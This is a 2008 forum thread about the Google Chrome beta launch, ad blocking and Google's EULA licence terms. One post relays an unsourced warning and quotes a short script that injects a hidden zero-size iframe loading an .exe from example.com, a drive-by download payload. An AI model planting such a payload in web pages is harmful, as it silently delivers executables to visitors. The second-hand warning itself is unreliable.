FAQ Memberlist Usergroups Register Log in
Profile Log in to check your private messages Search

The Google browser is out!!
Goto page 1, 2  Next

Tamir

PostPosted: Tue Sep 02, 2008 5:31 pm    Post subject: The Google browser is out!! Reply with quote

Click here to experience Google Chrome! I'm using it as I type this. Still not quite sure what to think, but I'll say this at least - Google rocks at making complicated things simple. And fast. This browser doesn't seem as capable as Firefox, but it's sure simple and fast.

For more information, read a comic! Or look at this nice explanation page.

EDIT: I've had a few more minutes to play around with it. The homepage is very fun and useful, I plan on using it even if I stick to Firefox (I hear there's a similar extension). Speaking of extensions, actually, they're very missing. I don't know how people can survive without Adblock and NoScript, to name but two. I notice that (at least some) ads get into Chrome, although it seems to block some malicious scripts on its own.
Needs more testing.

EDIT 2: I just don't feel like going to sleep. >_> I don't actually have anything more to say.
Cherynic

Location: Wandering the corridors of my mind... something ate the breadcrumbs.

PostPosted: Tue Sep 02, 2008 9:44 pm    Post subject: Reply with quote

Thanks for the update Tam! Smile

Keeper of Nanashi
Virturealm

PostPosted: Wed Sep 03, 2008 12:19 am    Post subject: Reply with quote

Meh, not particularly interested. Google visuals are kinda lame and my attention span is not enough to bother with these sort of things as they happen. If people are raving about it a couple years from now maybe I'll get it then. Firefox is fine now.

(Speaking of being behind, Adblock and Noscript, I heard about those in a topic on the forum here, and I thought they sounded awesome, but I put it off, and then the boards imploded, and thus I don't know where to go to get those anymore)
__|..|..|__|
Squeeself

PostPosted: Wed Sep 03, 2008 2:23 am    Post subject: Reply with quote

Let's put it this way...Google isn't gonna release a product that blocks their ads, plain and simple. That's their whole business model, and they're not gonna shoot themselves in the foot like that. Don't expect extensions in Chrome (or at least, extensions that could block ads). Of course, Squee doesn't use adblock & noscript on purpose; no adblock because Squee isn't about to remove revenue from legitimate sites, and noscript because it's simply annoying to have a broken page until you explicitly enable scripts. Never had much issue with scripts anyway.

Biggest deal about Chrome is its contributions to OTHER browers, not necessarily the browser itself. That, and Squee will bet you they'll be making something ala Adobe AIR but with Chrome soon enough. Which would be the perfect market for it, and also quite useful.

We'll see where Chrome goes. Atm, it's a solid product, but it really needs some more features to it to pull any true market share or usage by anyone. Since it's a Google Beta, Squee is sure it'll get some new features soon enough.
Tamir

PostPosted: Wed Sep 03, 2008 7:45 am    Post subject: Reply with quote

Squeeself wrote:
Let's put it this way...Google isn't gonna release a product that blocks their ads, plain and simple.

They could block image ads, since they use only (?) text ads, or they could block all non-Google ads. Either of these would make users more likely to use Chrome, I think.
Tinu.

PostPosted: Wed Sep 03, 2008 12:15 pm    Post subject: Reply with quote

Awesome.

Your post sounds like an advertisement. XD
Tamir

PostPosted: Wed Sep 03, 2008 2:34 pm    Post subject: Reply with quote

Well, I was just trying to make the post sound worthwhile. Razz I like Firefox better than chrome so far.
Squeeself

PostPosted: Wed Sep 03, 2008 2:43 pm    Post subject: Reply with quote

1. Google DOES do image ads now, on an opt-in basis for website owners.
2. Allowing only their competitors ads to be blocked would most certainly result in lawsuits, possibly anti-trust ones.
Tamir

PostPosted: Wed Sep 03, 2008 2:56 pm    Post subject: Reply with quote

Two good points. Shame. Well, at least it blocks pop-ups....
Nem

PostPosted: Wed Sep 03, 2008 4:16 pm    Post subject: Reply with quote

Thought I'd pass the warning along,

Quote:

Do not use Google Chrome, I cant emphasise how important it is

Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
downloaded to the user's computer without any user prompt.
Example:
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

This is just insane. this should be on the news or something, im sure that right now this exploit isnt an hour old, but still. its spreading quick enough.

Another which allows a site to connect a computer to a Zombie sleeper cell net sorta for later use in DDoS attacks

Careful guys

Don't know the original source of the report myself but it was passed onto me by someone who's usually alright.

Also apparently vulnerable to some other stuff from a more official source
http://blogs.zdnet.com/security/?p=1843
- Issa
Tamir

PostPosted: Wed Sep 03, 2008 4:21 pm    Post subject: Reply with quote

....yeah, that's good to know. o_o How easy it is to forget that the browser is still in beta...
Tyris

PostPosted: Wed Sep 03, 2008 4:24 pm    Post subject: Reply with quote

Squeeself wrote:
Allowing only their competitors ads to be blocked would most certainly result in lawsuits, possibly anti-trust ones.
That sounds... odd. Where's the trust in the first place? And what's actually wrong with it?

"It's a sad thing when a man loses his cookie." - Nem
Nem

PostPosted: Wed Sep 03, 2008 4:46 pm    Post subject: Reply with quote

I'd like to direct your attention to clause 11 of the EULA

Quote:
11. Content licence from you

11.1 You retain copyright and any other rights that you already hold in Content that you submit, post or display on or through the Services. By submitting, posting or displaying the content, you give Google a perpetual, irrevocable, worldwide, royalty-free and non-exclusive licence to reproduce, adapt, modify, translate, publish, publicly perform, publicly display and distribute any Content that you submit, post or display on or through the Services. This licence is for the sole purpose of enabling Google to display, distribute and promote the Services and may be revoked for certain Services as defined in the Additional Terms of those Services.

11.2 You agree that this licence includes a right for Google to make such Content available to other companies, organisations or individuals with whom Google has relationships for the provision of syndicated services and to use such Content in connection with the provision of those services.

11.3 You understand that Google, in performing the required technical steps to provide the Services to our users, may (a) transmit or distribute your Content over various public networks and in various media; and (b) make such changes to your Content as are necessary to conform and adapt that Content to the technical requirements of connecting networks, devices, services or media. You agree that this licence shall permit Google to take these actions.

11.4 You confirm and warrant to Google that you have all the rights, power and authority necessary to grant the above licence.

My personal advice would be not to use this program for uploading anything important to you if you use it at all. I've just been on the phone with the IT folks getting it banned from my workplace's computers.
- Issa
Tamir

PostPosted: Wed Sep 03, 2008 4:48 pm    Post subject: Reply with quote

Well, yeah, it's the same agreement in all of Google's Services. Did people not know about that? Maybe I should have said something about that one.
Nem

PostPosted: Wed Sep 03, 2008 5:05 pm    Post subject: Reply with quote

How many people actually read all the way through EULAs? It's a completely ridiculous idea to apply to a browser, especially since people upload so much stuff through them without thinking. I'm not even sure it's legally enforceable though it will probably never be challenged in court.
- Issa
Post new topic   Reply to topic     Forum Index -> General Discussion All times are GMT - 4 Hours
Goto page 1, 2  Next
Page 1 of 2

Jump to: